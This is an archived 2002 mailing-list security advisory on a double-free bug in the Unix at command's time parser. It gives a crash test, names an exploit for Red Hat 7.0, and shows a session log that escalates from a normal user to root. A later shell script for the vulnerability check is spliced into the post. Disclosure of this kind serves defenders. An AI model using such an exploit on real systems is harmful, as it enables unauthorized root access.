Affects: /usr/bin/at
To check if you are potentially vulnerable to this exploit, execute:
/usr/bin/at 31337 + vuln
If you are vulnerable this will cause:
Segmentation fault
If not, there will be a message similar to:
Garbled time
(possibly with some extra information)
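A small POSIX shell wrapper for the check above, added here as an example and not part of the original post: it runs the same `at 31337 + vuln` command, captures the exit status and output, and classifies the result as vulnerable, not vulnerable, or undetermined. The function names and the 139 exit-status convention (128 + SIGSEGV) are my assumptions, not something the post states.

```sh
#!/bin/sh
# Added example, not from the original advisory. Wraps the post's crash
# check so it can be run from a script or an audit job.

# classify_at_result STATUS OUTPUT
# A segfaulting child normally yields exit status 139 (128 + SIGSEGV); the
# "Segmentation fault" text is usually printed by the parent shell, so we
# look for both. "Garbled time" means the parser rejected the input cleanly.
classify_at_result() {
    status="$1"
    output="$2"
    if [ "$status" -eq 139 ] || echo "$output" | grep -q "Segmentation fault"; then
        echo "vulnerable"
    elif echo "$output" | grep -q "Garbled time"; then
        echo "not-vulnerable"
    else
        echo "undetermined"
    fi
}

# check_at [PATH_TO_AT]  (defaults to /usr/bin/at, as in the post)
check_at() {
    at_bin="${1:-/usr/bin/at}"
    if [ ! -x "$at_bin" ]; then
        echo "undetermined"
        return 0
    fi
    # Run the post's trigger and capture both the output and the exit status
    # without aborting under 'set -e' when the command fails.
    status=0
    output=$("$at_bin" 31337 + vuln 2>&1) || status=$?
    classify_at_result "$status" "$output"
}

check_at "$@"
```

An "undetermined" result (for example, a missing binary or an unrelated error message) should be investigated by hand rather than treated as safe.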
The problem is caused by a bug in at's parser which deallocates the same
memory location twice (a double free).
This can sometimes be exploited to run code as the "daemon" uid, and, due to
some other minor problems, root access may be obtainable from there.
Attached is an exploit for Redhat 7.0.
bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$
-- zen-parse
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it
may be redistributed without modification.
2) In any other case the contents of this message are confidential and not
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
This archive was generated by hypermail 2.1.3 : Thu Jan 17 2002 - 18:00:32 CET